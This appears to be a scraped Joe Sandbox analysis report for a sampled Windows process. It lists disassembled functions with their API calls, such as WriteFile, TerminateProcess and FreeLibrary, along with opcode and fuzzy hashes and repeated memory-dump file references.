Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0e18848afb70fb37f9ccbed4fbade7e65d1ffddb82f553cf39ff083e82a8ee4
Instruction ID: 638ad6d6df09e6156c9932a213d35473be4cff133cdf6d98f2ae81eabdefa52d
Opcode Fuzzy Hash: f0e18848afb70fb37f9ccbed4fbade7e65d1ffddb82f553cf39ff083e82a8ee4
Instruction Fuzzy Hash: 91C08C34010A004ACE2BA9148A72BAA7368F391BC2F88049DC8128B683C52EDC87D601

Uniqueness

Uniqueness Score: -1.00%

Function 00900612 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800), ref: 009006D3

Strings

ext-ms-, xrefs: 0090067D
api-ms-, xrefs: 00900669

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: d82b66c1197fcad45f035b0e59e3f5824a90f70aa8b572ec67c1421c352f77a7
Instruction ID: 14019408028edd0729cc6931fe53b2c9c075012e5a9e8044d82e823030b17795
Opcode Fuzzy Hash: d82b66c1197fcad45f035b0e59e3f5824a90f70aa8b572ec67c1421c352f77a7
Instruction Fuzzy Hash: 8121A532A55211EFD721AB24DC44B7A776EEFC1770F240221E906A72D1EB72ED10DAE0

Uniqueness

Uniqueness Score: -1.00%

Function 009105C8 Relevance: 7.8, APIs: 5, Instructions: 298
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17edd018ff263b0b25b0a2ce13f29a0dbd76d95a25547b904a11473d3ddbe8f5
Instruction ID: fa7a6d3a19e6d0f14843659a69a9d6deb301ef9bfecd9f9db8473a89548ac82a
Opcode Fuzzy Hash: 17edd018ff263b0b25b0a2ce13f29a0dbd76d95a25547b904a11473d3ddbe8f5
Instruction Fuzzy Hash: 6BB1D070B0820DAFEB11DF98C890BAD7BB5FF85310F144194E815AB292C7B699C5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008CD0B5 Relevance: 4.5, APIs: 3, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,008CD08A,?,?,?,?,27D23252), ref: 008CD0C6
TerminateProcess.KERNEL32(00000000,?,008CD08A,?,?,?,?,27D23252), ref: 008CD0CD
ExitProcess.KERNEL32 ref: 008CD0DF

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a48953e09ab4a507fb3031d624c0486f5936466ecb0a68f45362eb2c301aa2e6
Instruction ID: d421bf4e82bbdcfe6837ce4e1eb4638839df396b66a90df4d4dc1a2e88a96745
Opcode Fuzzy Hash: a48953e09ab4a507fb3031d624c0486f5936466ecb0a68f45362eb2c301aa2e6
Instruction Fuzzy Hash: 2ED06C32028208EFCF113F64EC19A69BF3AFE40351B488039B9098A132DF31D952EA91

Uniqueness

Uniqueness Score: -1.00%

Function 0090EB2A Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0090DFF0: GetConsoleOutputCP.KERNEL32(27D23252), ref: 0090E053

WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 0090EC93
GetLastError.KERNEL32 ref: 0090EC9D

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: 80cde486bb6b15ddbc6757317d7d81b8e7031e6c3a669fc9aee0c0f8de7c1de8
Instruction ID: 789fb555d1a44191b3f9dca556ca6addfd652b6b48855224a7ea707b10bb016e
Opcode Fuzzy Hash: 80cde486bb6b15ddbc6757317d7d81b8e7031e6c3a669fc9aee0c0f8de7c1de8
Instruction Fuzzy Hash: D061C371D04119AFEF158FA8C884EEE7BBDEF49308F144899F841AB292D336D941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0090E5D5 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0090E671
GetLastError.KERNEL32 ref: 0090E697

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 6009550579e74a8b13971e2b6ad0c1c3d3d0f3d9675cfd148fe24e6a607a8b82
Instruction ID: a7be669371b0b974e2d25cbe101435c9e2323eb47b4a07fd15c20f226e214002
Opcode Fuzzy Hash: 6009550579e74a8b13971e2b6ad0c1c3d3d0f3d9675cfd148fe24e6a607a8b82
Instruction Fuzzy Hash: B3219F75A002199FCF19CF29DC909E9B7FAEF58301F2448AAE906D7291D631DE46CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00901663 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00901770,009F3B78,0000000C), ref: 009016AF
GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00901770,009F3B78,0000000C), ref: 009016C1

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: bc560e4cdabec47da64c5e77eac3b9bc427fe246542afd0689f9b744b3ed6a26
Instruction ID: 97b8a062721d5507c816a874d7d8c4652c18d3e1f761319ef02b7d63b63d67ff
Opcode Fuzzy Hash: bc560e4cdabec47da64c5e77eac3b9bc427fe246542afd0689f9b744b3ed6a26
Instruction Fuzzy Hash: 5D1193726147418ECB304E3E8C88632BA9DAB56331B3D0B1EE4B6865F1D736D886DA45

Uniqueness

Uniqueness Score: -1.00%

Function 0088409F Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00883FA2: GetModuleHandleExW.KERNEL32(00000002,00000000,?), ref: 00883FAE

FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,27D23252,?,?,?,009243DA,000000FF), ref: 0088410D

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: CallbackFreeHandleLibraryModuleReturnsWhen
String ID:
API String ID: 3259068873-0
Opcode ID: 0c2bab6050df9ceaf3bfd02442533f6c25c77da1cac95f24586b057cabb7b5c9
Instruction ID: e949075b938c72513ea1c0cc28ee3da9327a8dcccedad63db314881e959216bc
Opcode Fuzzy Hash: 0c2bab6050df9ceaf3bfd02442533f6c25c77da1cac95f24586b057cabb7b5c9
Instruction Fuzzy Hash: AF1106769046156BCE217B69ED06B6E7BB8FB81B20F00452AFD06D2292DF35D900C792

Uniqueness

Uniqueness Score: -1.00%

Function 0085F6D0 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NotifyChangeEventLog.ADVAPI32 ref: 0085F74C

Memory Dump Source

Source File: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ChangeEventNotify
String ID:
API String ID: 4068267468-0
Opcode ID: 34c0f3fa83d2104a9c5376ca6197752f99f62b1cac03a17370eafe3c171bf08e
Instruction ID: 722c69688c48e1597592752659cb2e706520d66edadc96c29ece790921bf1a96
Opcode Fuzzy Hash: 34c0f3fa83d2104a9c5376ca6197752f99f62b1cac03a17370eafe3c171bf08e
Instruction Fuzzy Hash: CA2125B0D042198FCB04EFA9E8557DDBBB0FB48325F004629E925EB391D7384509CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0090070F Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ee5bd157ed8046e5f19f21d42c4aabc9e0143bb531fa8f23944913ad39e5dfa
Instruction ID: 2281a9cb6ded6e218907137b687410c3db46ed835402a055773a554f9f9b9cd9
Opcode Fuzzy Hash: 2ee5bd157ed8046e5f19f21d42c4aabc9e0143bb531fa8f23944913ad39e5dfa
Instruction Fuzzy Hash: C101B5376146159FDB258E69EC41B6A37DAABC4360B144220F914DB1D5DB34E841EB90

Uniqueness

Uniqueness Score: -1.00%

Function 008FFECE Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?), ref: 008FFF0F

Memory Dump Source

Source File: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 699b6903e19d86bd6def8ba18af1d3f0b362e35438dddadc3f6663a137a46adc
Instruction ID: 57f1419d5a8376788815c06f682c7d4cce3c4662d5c727eeb461a2d737312aec
Opcode Fuzzy Hash: 699b6903e19d86bd6def8ba18af1d3f0b362e35438dddadc3f6663a137a46adc
Instruction Fuzzy Hash: C9F0B43160852CA6DB215A76AC05A7A3748FF42770B148431BF14DA1A3CF30D80086A1

Uniqueness

Uniqueness Score: -1.00%

Function 0085EFF0 Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 0085F016

Memory Dump Source

Source File: 00000003.00000002.1658433931.000000000085E000.00000020.00000001.01000000.00000006.sdmp, Offset: 00850000, based on PE: true

Associated: 00000003.00000002.1658412173.0000000000850000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000851000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000879000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658433931.0000000000923000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.000000000092A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1658848314.00000000009EA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659259590.00000000009F5000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659279243.00000000009F6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659297615.00000000009F7000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659313208.00000000009F9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659330028.00000000009FA000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659351055.00000000009FC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659367517.00000000009FF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659384894.0000000000A37000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1659433850.0000000000A45000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_850000_2zx1310.jbxd

Yara matches

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 55fe6d043838a3200d0bddd7ca5e7e061d0524c0368c5661c3d2fd20545043af
